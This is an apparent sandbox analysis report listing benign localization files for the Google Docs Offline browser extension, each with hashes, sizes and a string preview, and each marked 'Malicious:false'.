                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):806
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                      MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                      SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                      SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                      SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):883
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                      MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                      SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                      SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                      SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1031
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                      MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                      SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                      SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                      SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1613
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                      MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                      SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                      SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                      SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):851
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                      MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                      SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                      SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                      SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):851
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                      MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                      SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                      SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                      SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):848
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                      MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                      SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                      SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                      SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1425
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                      MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                      SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                      SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                      SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):961
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                      MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                      SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                      SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                      SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):959
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                      MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                      SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                      SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                      SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):968
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                      MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                      SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                      SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                      SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):838
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                      MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                      SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                      SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                      SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1305
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                      MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                      SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                      SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                      SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):911
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                      MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                      SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                      SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                      SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
